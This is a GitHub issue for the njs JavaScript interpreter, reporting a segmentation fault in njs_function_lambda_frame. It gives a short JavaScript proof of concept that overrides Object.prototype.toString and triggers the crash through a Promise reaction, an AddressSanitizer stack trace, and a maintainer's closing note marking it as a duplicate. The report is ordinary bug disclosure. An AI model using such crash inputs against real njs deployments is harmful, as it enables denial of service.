
SEGV njs_function.c:443:13 in njs_function_lambda_frame #484

Closed
Q1IQ opened this issue Mar 2, 2022 · 1 comment

Comments


Q1IQ commented Mar 2, 2022

Environment

OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

Proof of concept

function main() {
    function a0(a1) {
        const a2 = {};
        const a3 = a2.__proto__;      // Object.prototype
        const a4 = {};
        const a5 = a4[8];             // undefined
        function a6(a7, a8) {
            a3.toString = a8;         // replaces Object.prototype.toString with the lambda a6
        }
        const a9 = a6(a5, a6);
        const a12 = "includes"[{}](); // ToPropertyKey({}) invokes the overridden toString
    }
    const a17 = new Promise(a0);
    const a19 = a17["then"](a0, a0);  // a0 runs again as a promise reaction job
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==732131==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000883 (pc 0x00000053a900 bp 0x7ffe73bf2d30 sp 0x7ffe73bf2ca0 T0)
==732131==The signal is caused by a READ memory access.
==732131==Hint: address points to the zero page.
    #0 0x53a900 in njs_function_lambda_frame /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:443:13
    #1 0x53acef in njs_function_frame /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.h:155:16
    #2 0x53acef in njs_function_call2 /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:595:11
    #3 0x5f45b7 in njs_function_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.h:180:12
    #4 0x5f45b7 in njs_promise_reaction_job /home/q1iq/Documents/origin/njs_f65981b/src/njs_promise.c:1171:15
    #5 0x53c9ec in njs_function_native_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:739:11
    #6 0x4deb20 in njs_vm_invoke /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:440:12
    #7 0x4deb20 in njs_vm_call /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:424:12
    #8 0x4deb20 in njs_vm_handle_events /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:584:19
    #9 0x4deb20 in njs_vm_run /home/q1iq/Documents/origin/njs_f65981b/src/njs_vm.c:544:12
    #10 0x4c82d7 in njs_process_script /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:924:15
    #11 0x4c73a1 in njs_process_file /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:619:11
    #12 0x4c73a1 in main /home/q1iq/Documents/origin/njs_f65981b/src/njs_shell.c:303:15
    #13 0x7fc3c967e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #14 0x41dabd in _start (/home/q1iq/Documents/origin/njs_f65981b/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs_f65981b/src/njs_function.c:443:13 in njs_function_lambda_frame
==732131==ABORTING

Credit

Q1IQ(@Q1IQ)

xeioex (Contributor) commented Apr 6, 2022

Duplicate of #467.

xeioex closed this as completed Apr 6, 2022